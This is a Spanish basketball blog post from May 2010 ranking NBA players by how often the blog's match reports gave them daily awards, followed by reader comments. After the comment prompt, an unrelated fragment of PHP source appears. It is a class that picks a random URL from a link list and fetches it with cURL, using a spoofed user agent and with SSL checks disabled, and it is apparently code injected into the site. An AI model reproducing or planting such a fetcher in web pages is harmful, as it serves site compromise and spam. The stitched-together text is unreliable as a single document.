Los premios de las crónicas

06 de May de 2010 por txusma

Como sabéis, en cada crónica que realizamos otorgamos unos premios a los jugadores más destacados (o no…) de la jornada. Pues bien, nuestro comentarista habitual “Rompe” ha tenido la paciencia de recopilar todos esos premios y elaborar una clasificación de todos ellos, lo que nos permite obtener una radiografía de cómo ha ido la temporada en general. ¿Se corresponden los premios diarios con los de final de la temporada? Veámoslo:

MVP: Sin sorpresas. Lebron James ha aparecido hasta 29 veces en el apartado del MVP de la jornada dejando al segundo clasificado, Kobe Bryant, a 14 apariciones de distancia. Y estamos convencidos de que si no ha aparecido más es porque estamos ya acostumbrados a sus monumentales actuaciones y también nos aburre otorgarle día sí y día también el premio. En tercera posición, aparecen empatados Dirk Nowitzki, Carmelo Anthony y Dwyane Wade con 13 nominaciones. Hasta 90 jugadores han recibido alguna vez el premio, entre ellos gente como Ben Wallace, Nazr Mohameed o Eric Dampier. Sorprende, y mucho, que esta gente haya obtenido el mismo número de premios (1) que Rajon Rondo, Paul Pierce, Al Horford, Jamal Crawford o Tony Parker, por ejemplo. ¿Nos deberíamos plantear alguna cosa?

Rookie: Algo más apretada ha estado la lucha en los rookies pero también con claro ganador. Tyreke Evans ha acumulado 37 nominaciones, por 27 de Stephen Curry o 24 de Brandon Jennings y Darren Collison. Además el de Sacramento ha conseguido hasta 5 apariciones en el MVP, por 3 de Curry y 2 de Jennings. Hay que comentar que somos muy poco exigentes con este premio  y siempre nos gusta mencionar a algún rookie que ha cuajado simplemente un buen partido o que ha disfrutado de más minutos de los habituales y no ha desentonado aunque ni se acerque a los números de los grandes. Por eso, hasta 35 rookies han aparecido en alguna ocasión. ¿Nos habremos dejado a alguno?

Sorpresa: Seguramente el hecho de seguir con lupa a los españoles ha provocado que Sergio Rodríguez y Rudy Fernández aparezcan en los primeros puestos de la lista solamente detrás de Anthony Tolliver, sin duda una de las grandes sorpresas de la temporada. Al realizar ambos unas campañas tan flojas, los hemos destacados en cuanto realizaban algún buen partido. Evidentemente, se trata de la categoría con más jugadores ya que no es complicado aparecer por aquí. Tan solo hace falta un partido con unas estadísticas mejores que las habituales. Carlos Delfino y Danthay Jones son los otros dos jugadores que han aparecido en más de 3 ocasiones.

Decepción: Baron Davis, Dwight Howard, Kobe Bryant, Michael Beasley y Richard Jefferson son los 5 jugadores que más veces han sido la decepción de la jornada. Exceptuando a Bryant creo que no hemos fallado mucho  y es que la temporada de Howard ha estado un punto por debajo del nivel esperado como ya nos hemos cansado de comentar en el blog. Los otros 3 sujetos han sido, sin duda, 3 de las grandes decepciones de esta campaña. A estos les siguen Al Jefferson, Elton Brand y Monta Ellis.

Esfuerzo en vano: Este año el premio a “Esfuerzo en vano del año” de la temporada no se lo lleva Danny Granger, sinó Chris Bosh que con 10 premios se sitúa en cabeza. A un paso se han quedado David Lee (otro clásico) y Kevin Durant. Y un paso más atrás Monta Ellis (es lo que tiene perder tanto) y… Carmelo Anthony y Lebron James. ¿Sorprendidos? En absoluto. Es tan poco común que Nuggets o Cavs pierdan que cuando lo hacen, a poco que hayan mantenido sus niveles, estos dos aparecen siempre como el esfuerzo en vano de la jornada. El proclamado por aclamación (porque no lo contamos) ganador del año pasado, se ha quedado en 6 menciones.

Si queréis consultar las tablas completas lo podéis hacer aquí.

Muchas gracias a “Rompe” por el esfuerzo. Éste no ha sido en vano.

Comenta

11 comentarios a esta entrada

  1. MagicJohnson32 dice:
    #1

    Vaya crack! En general todo resulta bastante coherente, con alguna pequeña sorpresa.

    Gracias por el curro, es interesante.

      Citar

  2. TheDeerHunter dice:
    #2

    impresionante… este artículo debería quedar institucionalizado para el blog

    ahora lo que hecho de menos es que alguien salga diciendo que por haber elegido a éste o aquel los cronistas no tenemos ni puta idea

      Citar

  3. sayim dice:
    #3

    Estupendo trabajo. Feliciades por él y muchas gracias

    Deer si algo he aprendido en este blog es que sabeis mucho más de baloncesto que yo, los cronistas especialmente

    Coincido bastante con los resultados, quizá lo que más me chirríe es en el apartado de decepción ver a Monta Ellis (que no ha hecho mala temporada dentro de la locura de los Warriors) y que no estén los “fichajes estrella” de los pistons, Trevor Ariza (se fue para ser All Star), Turkoglu o Calderón y Rudy entre los nuestros

    Un saludo

      Citar

  4. sergio dice:
    #4

    Muy bien explicadas las estadisticas. Cualquiera que haya seguido minimamente el blog puede entender los pequeño “sucesos extraños” que salen en las listas.

    Ya sabeis que a mi me encantan las estadisticas, y me parece perfecto que el blog tenga las suyas propias. Apoyo lo que dice Deer de institucionalizar este tipo de articulos e incluso incorporar similares (como el que se saca en fin de año con los articulos mas leidos y comentados)

    Enhorabuena de nuevo gente…

      Citar

  5. TheDeerHunter dice:
    #5

    Esos que mencionas están todos en la lista completa de decepciones, sayim… un poco más abajo si la consultas.

    Si hay algo que he aprendido yo, y aquí hablo por todos los que participamos en el blog… a excepción de Sergio que igual se lleva el trivial, a los demás nos la trufa saber más o menos de baloncesto. No se trata de un concurso de conocimientos.
    Si al final lo que llegamos a saber es porque nos gusta, y el único partido que sacamos al asunto es tener la suerte de compartir impresiones con vosotros y disfrutar más aún de nuestro hobby.
    Todavía no me han subido nunca el sueldo por escribir aquí (aunque se lo recuerdo siempre que puedo a Txusma)

      Citar

  6. Rompe dice:
    #6

    Bueno, este curro no es nada comparado con el gran curro de los administradores, a los que felicito una vez más por aquí. Al fin y al cabo no se tarda nada rellenar las listas cada día. A final de año sí que sale un buen curro, pero es cosa de medio minuto al día.

      Citar

  7. Txusma dice:
    #7

    Los premios de Monta Ellis los puedo explicar yo que creo que le di unos cuantos de decepciones. Fue en una época en la que perdía 8 o más balones por partido, no sé si lo recordáis. Creo que llegó a 11 o 13. Además ha tenido partidos de muy malos porcentajes…

      Citar

  8. sergio dice:
    #8

    Al final Gasol en el 3er equipo ideal de la liga. Al igual que en el All-Star le ha perjudicado que Stoudamire sea considerado como pivot y el no…

      Citar

  9. Viva_Dirk dice:
    #9

    No puedo abrir la tabla completa, pero lo único que me extraña es no ver a Turkoglu liderando el apartado de decepción.

      Citar

  10. Txusma dice:
    #10

    Sinceramente, a mi Turkoglu no me ha decepcionado lo más mínimo. Ecos de “Cazo Mix”

      Citar

  11. Rompe dice:
    #11

    Hablando de todo un poco, debe ser un gran tipo este Grant Hill. Ha ganado por tercera vez el premio al jugador más deportivo…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>